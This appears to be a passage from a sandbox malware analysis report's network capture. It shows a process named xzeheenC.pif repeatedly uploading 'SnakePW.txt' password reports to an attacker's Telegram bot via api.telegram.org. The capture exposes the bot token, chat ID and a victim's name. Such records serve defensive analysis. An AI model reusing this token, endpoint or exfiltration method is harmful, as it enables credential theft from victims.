                                                                                                        2024-12-18 15:32:20 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 33 39 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419230,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535939,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        107192.168.2.849905149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:20 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd246a28398923
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:20 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 36 61 32 38 33 39 38 39 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd246a28398923Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:21 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:20 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:21 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 34 30 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419232,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535940,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        108192.168.2.849906149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:21 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2370c4ba52f1
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:21 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 37 30 63 34 62 61 35 32 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2370c4ba52f1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:21 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:21 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:21 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 34 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419234,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535941,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        109192.168.2.849908149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:21 UTC352OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd224ec822fa72
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-18 15:32:21 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 34 65 63 38 32 32 66 61 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd224ec822fa72Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:22 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:21 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:22 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 34 31 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419236,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535941,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        110192.168.2.849913149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:22 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd24d2b90dc0e1
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:22 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 64 32 62 39 30 64 63 30 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd24d2b90dc0e1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:22 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:22 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 513
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:22 UTC513INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 34 32 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419238,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535942,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        111192.168.2.849914149.154.167.2204433428C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:23 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd23bc8169851c
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:23 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 62 63 38 31 36 39 38 35 31 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 35 33 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd23bc8169851cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:53Client IP:
                                                                                                        2024-12-18 15:32:23 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:23 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:23 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 34 33 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419240,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535943,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        112192.168.2.849915149.154.167.2204437064C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:23 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd227d39ecb039
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:23 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 32 37 64 33 39 65 63 62 30 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 31 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd227d39ecb039Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:31:00Client IP:
                                                                                                        2024-12-18 15:32:24 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:24 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                        2024-12-18 15:32:24 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 39 32 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 39 34 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                        Data Ascii: {"ok":true,"result":{"message_id":419242,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535944,"documen


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        113192.168.2.849920149.154.167.2204436760C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 15:32:24 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8dd2565e5b25501
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 535
                                                                                                        2024-12-18 15:32:24 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 35 36 35 65 35 62 32 35 35 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 68 75 62 65 72 74 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 33 30 3a 33 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                        Data Ascii: --------------------------8dd2565e5b25501Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:30:38Client IP:
                                                                                                        2024-12-18 15:32:25 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Wed, 18 Dec 2024 15:32:24 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 515
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
